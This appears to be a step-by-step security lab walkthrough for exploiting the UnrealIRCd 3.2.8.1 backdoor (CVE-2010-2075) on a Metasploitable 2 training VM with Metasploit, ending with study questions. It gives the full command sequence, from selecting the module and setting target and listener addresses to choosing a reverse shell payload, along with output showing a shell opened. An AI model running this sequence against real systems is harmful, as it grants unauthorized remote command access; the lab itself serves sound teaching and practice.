UnrealIRCd backdoor [CVE-2010-2075]

UnrealIRCd backdoor [CVE-2010-2075]

Note: these labs are extremely oriented to the results, using a step-by-step guidance. During your progress, try to find more information and understand what you are doing.

Requirements

Kali Linux	The Kali Linux VM (or any other type of installation)
Metaploitable 2	The Metasploitable 2 VM
Metasploitable Framework	Metasploit Framework toolset (installed on Kali Linux by default)
Metasploitable 2 IP	The IP address of the Metasploitable 2 VM. In my case it is 192.168.8.142. This may be different in your specific case.
Kali Linux IP	The IP address of the Kali Linux machine. In my case it is 192.168.8.147. This may be different in your specific case.

Laboratory Workflow

The following describe the different steps to be conducted during the laboratory. You may introduce variations on this and learn from those variations.

1. Launch the Metasploit Framework

msfconsole

2. Search for the appropriate module

search unreal_irc

Matching Modules
================

   #  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   0  exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12       excellent  No     UnrealIRCD 3.2.8.1 Backdoor Command Execution

3. Use the module

use exploit/unix/irc/unreal_ircd_3281_backdoor

4. Check the module options

options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT   6667             yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

View the full module info with the info, or info -d command.

5. Set the appropriate options

set RHOSTS 192.168.8.142

RHOSTS => 192.168.8.142

6. Show possible payloads

show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)
   1   payload/cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   2   payload/cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)
   3   payload/cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   4   payload/cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
   5   payload/cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   6   payload/cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   7   payload/cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)
   8   payload/cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   9   payload/cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   10  payload/cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   11  payload/cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)

7. Select the payload

set PAYLOAD payload/cmd/unix/reverse

PAYLOAD => cmd/unix/reverse

8. Show options for payload

show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  192.168.8.142    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT   6667             yes       The target port (TCP)

Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

View the full module info with the info, or info -d command.

9. Fill the options for the payload

set LHOST 192.168.8.147

LHOST => 192.168.8.147

10. Run the exploit

exploit

[*] Started reverse TCP double handler on 192.168.8.147:4444 
[*] 192.168.8.142:6667 - Connected to 192.168.8.142:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 192.168.8.142:6667 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 2deEA9aiYAIk24Xy;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "2deEA9aiYAIk24Xy\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (192.168.8.147:4444 -> 192.168.8.142:36910) at 2023-03-28 07:36:16 -0400

Video

Video that resumes everything on this laboratory.

Questions

Now that you have completed this exploitation try to answer to following:

1. Now, what can I do with the exploitation achieved?

2. Which type of privileges do I have on the exploited target?

3. How was this accomplished?

4. Try to learn more about this vulnerability.